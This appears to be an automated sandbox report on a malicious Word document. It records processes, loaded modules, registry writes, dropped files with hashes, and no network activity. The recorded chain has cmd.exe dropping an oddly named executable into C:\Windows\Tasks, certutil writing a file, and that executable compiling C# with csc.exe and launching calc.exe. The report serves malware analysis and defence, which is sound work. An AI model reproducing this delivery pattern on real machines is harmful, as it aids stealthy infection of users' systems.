c:\windows\assembly\nativeimages_v4.0.30319_32\system.xml\d86b080a37c60a872c82b912a2a63dac\system.xml.ni.dll
c:\windows\microsoft.net\framework\v4.0.30319\microsoft.build.tasks.v4.0.dll
c:\windows\microsoft.net\assembly\gac_msil\microsoft.build.tasks.v4.0\v4.0_4.0.0.0__b03f5f7f11d50a3a\microsoft.build.tasks.v4.0.dll
c:\windows\assembly\nativeimages_v4.0.30319_32\microsoft.baa2ca56b#\c5780fb3b27e8923876e7cb311b1f338\microsoft.build.tasks.v4.0.ni.dll
c:\windows\assembly\nativeimages_v4.0.30319_32\microsoft.b83e9cb53#\761de11ec39160feee337c17175028db\microsoft.build.utilities.v4.0.ni.dll
c:\windows\system32\rpcrtremote.dll
c:\windows\system32\apphelp.dll
c:\windows\microsoft.net\framework\v4.0.30319\csc.exe
c:\windows\assembly\gac_msil\system.management.automation\1.0.0.0__31bf3856ad364e35\system.management.automation.dll
c:\windows\assembly\gac_msil\microsoft.powershell.commands.diagnostics\1.0.0.0__31bf3856ad364e35\microsoft.powershell.commands.diagnostics.dll
c:\windows\assembly\nativeimages_v4.0.30319_32\system.confe64a9051#\ecc5bbc5c2734b2451ced2f668f40911\system.configuration.install.ni.dll
c:\windows\assembly\gac_msil\microsoft.wsman.management\1.0.0.0__31bf3856ad364e35\microsoft.wsman.management.dll
c:\windows\assembly\gac_msil\microsoft.wsman.runtime\1.0.0.0__31bf3856ad364e35\microsoft.wsman.runtime.dll
c:\windows\assembly\nativeimages_v4.0.30319_32\system.transactions\e7044d177c8e852b85908d2702898ec8\system.transactions.ni.dll
c:\windows\microsoft.net\assembly\gac_32\system.transactions\v4.0_4.0.0.0__b77a5c561934e089\system.transactions.dll
c:\windows\assembly\gac_msil\microsoft.powershell.commands.utility\1.0.0.0__31bf3856ad364e35\microsoft.powershell.commands.utility.dll
c:\windows\assembly\gac_msil\microsoft.powershell.consolehost\1.0.0.0__31bf3856ad364e35\microsoft.powershell.consolehost.dll
c:\windows\assembly\gac_msil\microsoft.powershell.commands.management\1.0.0.0__31bf3856ad364e35\microsoft.powershell.commands.management.dll
c:\windows\assembly\nativeimages_v4.0.30319_32\system.management\4dfa27fdd6a4cce26f99585e1c744f9b\system.management.ni.dll
c:\windows\assembly\nativeimages_v4.0.30319_32\system.serv759bfb78#\86909e4c4c7deb51e42b8f335c7aaa77\system.serviceprocess.ni.dll
c:\windows\assembly\gac_msil\microsoft.powershell.security\1.0.0.0__31bf3856ad364e35\microsoft.powershell.security.dll
c:\windows\assembly\nativeimages_v4.0.30319_32\system.dired13b18a9#\34fd28526bdd6ec1e9f0d0776062fbbb\system.directoryservices.ni.dll
c:\windows\system32\secur32.dll
c:\windows\system32\sspicli.dll
c:\windows\assembly\nativeimages_v4.0.30319_32\system.data\032f5fa875be86b577722ddeeee2e51c\system.data.ni.dll
c:\windows\microsoft.net\assembly\gac_32\system.data\v4.0_4.0.0.0__b77a5c561934e089\system.data.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\nsi.dll
c:\windows\system32\msasn1.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\propsys.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll
c:\windows\system32\clbcatq.dll
c:\windows\system32\ntmarta.dll
c:\windows\system32\wldap32.dll
c:\windows\system32\profapi.dll
c:\windows\system32\urlmon.dll
c:\windows\system32\wininet.dll
c:\windows\system32\iertutil.dll
c:\windows\system32\setupapi.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\devobj.dll

PID
1136
CMD
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\admin\AppData\Local\Temp\sbfymty2.cmdline"
Path
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
Indicators
No indicators
Parent process
weXfvlHFdeZDapgOMUTXuEy.exe
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Microsoft Corporation
Description
Visual C# Command Line Compiler
Version
4.6.1055.0 built by: NETFXREL2
Modules
Image
c:\windows\microsoft.net\framework\v4.0.30319\csc.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\msvcr120_clr0400.dll
c:\windows\system32\ole32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\psapi.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\version.dll
c:\windows\system32\cryptbase.dll
c:\windows\microsoft.net\framework\v4.0.30319\alink.dll
c:\windows\system32\imagehlp.dll
c:\windows\system32\mscoree.dll
c:\windows\microsoft.net\framework\v4.0.30319\mscoreei.dll
c:\windows\microsoft.net\framework\v4.0.30319\clr.dll
c:\windows\system32\cryptsp.dll
c:\windows\system32\rsaenh.dll
c:\windows\microsoft.net\framework\v4.0.30319\mscorpehost.dll
c:\windows\microsoft.net\framework\v4.0.30319\diasymreader.dll
c:\windows\system32\apphelp.dll
c:\windows\microsoft.net\framework\v4.0.30319\cvtres.exe

PID
2992
CMD
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\admin\AppData\Local\Temp\RES41F.tmp" "c:\Users\admin\AppData\Local\Temp\CSC62941A302B5744F3BCDAF94F24BED6.TMP"
Path
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
Indicators
No indicators
Parent process
csc.exe
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Microsoft Corporation
Description
Microsoft® Resource File To COFF Object Conversion Utility
Version
12.00.52512.0 built by: VSWINSERVICING
Modules
Image
c:\windows\microsoft.net\framework\v4.0.30319\cvtres.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\msvcr120_clr0400.dll
c:\windows\system32\cryptsp.dll
c:\windows\system32\rsaenh.dll
c:\windows\system32\cryptbase.dll

PID
676
CMD
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\admin\AppData\Local\Temp\mxq0ngbg.cmdline"
Path
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
Indicators
No indicators
Parent process
weXfvlHFdeZDapgOMUTXuEy.exe
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Microsoft Corporation
Description
Visual C# Command Line Compiler
Version
4.6.1055.0 built by: NETFXREL2
Modules
Image
c:\windows\microsoft.net\framework\v4.0.30319\csc.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\msvcr120_clr0400.dll
c:\windows\system32\ole32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\psapi.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\version.dll
c:\windows\system32\cryptbase.dll
c:\windows\microsoft.net\framework\v4.0.30319\alink.dll
c:\windows\system32\imagehlp.dll
c:\windows\system32\mscoree.dll
c:\windows\microsoft.net\framework\v4.0.30319\mscoreei.dll
c:\windows\microsoft.net\framework\v4.0.30319\clr.dll
c:\windows\system32\cryptsp.dll
c:\windows\system32\rsaenh.dll
c:\windows\microsoft.net\framework\v4.0.30319\mscorpehost.dll
c:\windows\microsoft.net\framework\v4.0.30319\diasymreader.dll
c:\windows\system32\apphelp.dll

PID
3856
CMD
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\admin\AppData\Local\Temp\RES596.tmp" "c:\Users\admin\AppData\Local\Temp\CSCF85D058A7E984FFE93CC9BB1D9A5AF.TMP"
Path
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
Indicators
No indicators
Parent process
csc.exe
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Microsoft Corporation
Description
Microsoft® Resource File To COFF Object Conversion Utility
Version
12.00.52512.0 built by: VSWINSERVICING
Modules
Image
c:\windows\microsoft.net\framework\v4.0.30319\cvtres.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\msvcr120_clr0400.dll
c:\windows\system32\cryptsp.dll
c:\windows\system32\rsaenh.dll
c:\windows\system32\cryptbase.dll

PID
1152
CMD
"C:\Windows\system32\calc.exe"
Path
C:\Windows\system32\calc.exe
Indicators
No indicators
Parent process
weXfvlHFdeZDapgOMUTXuEy.exe
User
admin
Integrity Level
MEDIUM
Version:
Company
Microsoft Corporation
Description
Windows Calculator
Version
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Image
c:\windows\system32\calc.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\shell32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\winsxs\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_72d18a4386696c80\gdiplus.dll
c:\windows\system32\ole32.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\uxtheme.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll
c:\windows\system32\winmm.dll
c:\windows\system32\version.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\windowscodecs.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\clbcatq.dll
c:\windows\system32\oleacc.dll

Registry activity

Total events
730
Read events
699
Write events
31
Delete events
0

Modification events

PID
Process
Operation
Key
Name
Value
3328
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
yz>
797A3E00000D0000010000000000000000000000
3328
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
1033
Off
3328
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
1033
On
3328
WINWORD.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage
WORDFiles
1321992222
3328
WINWORD.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage
ProductFiles
1321992336
3328
WINWORD.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage
ProductFiles
1321992337
3328
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word
MTTT
000D00003E61F9D2BF20D50100000000
3328
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
>|>
3E7C3E00000D000004000000000000008C00000001000000840000003E0043003A005C00550073006500720073005C00610064006D0069006E005C0041007000700044006100740061005C0052006F0061006D0069006E0067005C004D006900630072006F0073006F00660074005C00540065006D0070006C0061007400650073005C004E006F0072006D0061006C002E0064006F0074006D00000000000000
3328
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
UNCAsIntranet
0
3328
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
AutoDetect
1
3328
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
5~>
357E3E00000D00000600000001000000DE00000002000000CE0000000400000063003A005C00750073006500720073005C00610064006D0069006E005C0061007000700064006100740061005C006C006F00630061006C005C00740065006D0070005C0065003700300039003000350039003000350035003100640062003500390038003600350033003700630066003500390037003900660037006600330036003700620032003200630031006300380032003300310062006600610035003800620030003300320034003400390066003100350064003700630038003800360061002E0064006F006300000000000000
3328
WINWORD.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage
ProductFiles
1321992338
3328
WINWORD.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage
ProductFiles
1321992339
3328
WINWORD.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109E60090400000000000F01FEC\Usage
TCWP5FilesIntl_1033
1321992193
3328
WINWORD.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109E60090400000000000F01FEC\Usage
TCWP6FilesIntl_1033
1321992193
3328
WINWORD.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109E60090400000000000F01FEC\Usage
TCWP5FilesIntl_1033
1321992194
3328
WINWORD.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109E60090400000000000F01FEC\Usage
TCWP6FilesIntl_1033
1321992194
3328
WINWORD.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109E60090400000000000F01FEC\Usage
TCWP5FilesIntl_1033
1321992195
3328
WINWORD.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109E60090400000000000F01FEC\Usage
TCWP6FilesIntl_1033
1321992195
3328
WINWORD.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage
VBAFiles
1321992196
3328
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\ReviewCycle
ReviewToken
{D056BC21-229C-4F48-A080-DD33C3C5FE94}
3328
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Place MRU
Max Display
25
3328
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\File MRU
Max Display
25
3328
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\DocumentRecovery\11F7FA
11F7FA
04000000000D00006600000043003A005C00550073006500720073005C00610064006D0069006E005C0041007000700044006100740061005C004C006F00630061006C005C00540065006D0070005C0065003700300039003000350039003000350035003100640062003500390038003600350033003700630066003500390037003900660037006600330036003700620032003200630031006300380032003300310062006600610035003800620030003300320034003400390066003100350064003700630038003800360061002E0064006F0063004400000065003700300039003000350039003000350035003100640062003500390038003600350033003700630066003500390037003900660037006600330036003700620032003200630031006300380032003300310062006600610035003800620030003300320034003400390066003100350064003700630038003800360061002E0064006F0063000000000001000000000000002213EBD2BF20D501FAF71100FAF7110000000000DB040000000000000000000000000000000000000000000000000000FFFFFFFF0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000FFFFFFFF
1916
weXfvlHFdeZDapgOMUTXuEy.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
UNCAsIntranet
0
1916
weXfvlHFdeZDapgOMUTXuEy.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
AutoDetect
1
1152
calc.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Calc
Window_Placement
2C0000000000000001000000FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF6E0000005C0000008E030000B4020000

Files activity

Executable files
1
Suspicious files
0
Text files
17
Unknown types
2

Dropped files

PID
Process
Filename
Type
3656
cmd.exe
C:\Windows\Tasks\weXfvlHFdeZDapgOMUTXuEy.exe
executable
MD5: 0517ef5a34a4ed8e9aacfa71201a23c9
SHA256: 70eccabe83df280dd393aa683cf9a408f766e015ffec4f78f0444bd46e3fa4fa
3328
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\CVRF2D9.tmp.cvr
––
MD5:  ––
SHA256:  ––
3856
cvtres.exe
C:\Users\admin\AppData\Local\Temp\RES596.tmp
––
MD5:  ––
SHA256:  ––
676
csc.exe
C:\Users\admin\AppData\Local\Temp\mxq0ngbg.pdb
––
MD5:  ––
SHA256:  ––
676
csc.exe
C:\Users\admin\AppData\Local\Temp\CSCF85D058A7E984FFE93CC9BB1D9A5AF.TMP
––
MD5:  ––
SHA256:  ––
1916
weXfvlHFdeZDapgOMUTXuEy.exe
C:\Users\admin\AppData\Local\Temp\mxq0ngbg.cmdline
text
MD5: 364ef89e47abc201d2f214abfd1c703d
SHA256: bab67207755af82260cb1ff308e5b0ccb0827ce5019183b9bb0bb7794723b8b1
1916
weXfvlHFdeZDapgOMUTXuEy.exe
C:\Users\admin\AppData\Local\Temp\mxq0ngbg.0.cs
text
MD5: 03086a5a827f697b396810d4a9618f36
SHA256: 866853d6663eed4469ed05ad2ce9f7fc615a77fb996e89c679f34b63b56bf9ad
1136
csc.exe
C:\Users\admin\AppData\Local\Temp\sbfymty2.out
––
MD5:  ––
SHA256:  ––
1136
csc.exe
C:\Users\admin\AppData\Local\Temp\sbfymty2.dll
––
MD5:  ––
SHA256:  ––
2992
cvtres.exe
C:\Users\admin\AppData\Local\Temp\RES41F.tmp
––
MD5:  ––
SHA256:  ––
1136
csc.exe
C:\Users\admin\AppData\Local\Temp\CSC62941A302B5744F3BCDAF94F24BED6.TMP
––
MD5:  ––
SHA256:  ––
1136
csc.exe
C:\Users\admin\AppData\Local\Temp\sbfymty2.pdb
––
MD5:  ––
SHA256:  ––
1916
weXfvlHFdeZDapgOMUTXuEy.exe
C:\Users\admin\AppData\Local\Temp\sbfymty2.cmdline
text
MD5: 4c5bfdcbca50c96483fc95cbea78f0be
SHA256: eeef89c2ce35fbe9d28410e998319878e963c1de2462e54947f0ff94436783c4
1916
weXfvlHFdeZDapgOMUTXuEy.exe
C:\Users\admin\AppData\Local\Temp\sbfymty2.0.cs
text
MD5: 74ad493bf142fc63b8c4851b9909bcc1
SHA256: 4f29ddcd98f577adc0e4afcc6bf2f18a5fd8f12140603953a7422a933d019d95
676
csc.exe
C:\Users\admin\AppData\Local\Temp\mxq0ngbg.out
––
MD5:  ––
SHA256:  ––
3264
certutil.exe
C:\Users\admin\AppData\Local\Temp\UpLkHEF
text
MD5: 47cb4c9e88aff578ffb0b8e7104717f6
SHA256: 11876529b6ea5ab398e48c5f6945c1d13f5cd5d1ebef08c1f43b1865e04d5126
3656
cmd.exe
C:\Users\admin\AppData\Local\Temp\LKyigCFSSVDvtJb
text
MD5: 4a4a61e4ed4562bd5d5f2d9ba9d1d538
SHA256: 8a37525da48dce5af0b90e8e891eb67dc7a9296036ce7100d1ab13b6a080b697
1928
cmd.exe
C:\Users\admin\AppData\Local\Temp\LKyigCFSSVDvtJb
text
MD5: 4a4a61e4ed4562bd5d5f2d9ba9d1d538
SHA256: 8a37525da48dce5af0b90e8e891eb67dc7a9296036ce7100d1ab13b6a080b697
3328
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\~$090590551db5986537cf5979f7f367b22c1c8231bfa58b032449f15d7c886a.doc
pgc
MD5: 3a22272b94d8c56c5eff52ced9076a78
SHA256: c7ccc6877040d6f0ab398b0e8fd4283c2cf2e85663960d410afe58dfb45aa2a8
3328
WINWORD.EXE
C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
pgc
MD5: c111f99cd469831004e4547e39009b06
SHA256: 3479c3cb813b5d1c331b8400a690378d71df89f98184e62788f05713d903f6af
676
csc.exe
C:\Users\admin\AppData\Local\Temp\mxq0ngbg.dll
––
MD5:  ––
SHA256:  ––

Find more information of the staic content and download it at the full report

Network activity

HTTP(S) requests
0
TCP/UDP connections
0
DNS requests
0
Threats
0

No network activity.

Debug output strings

No debug info.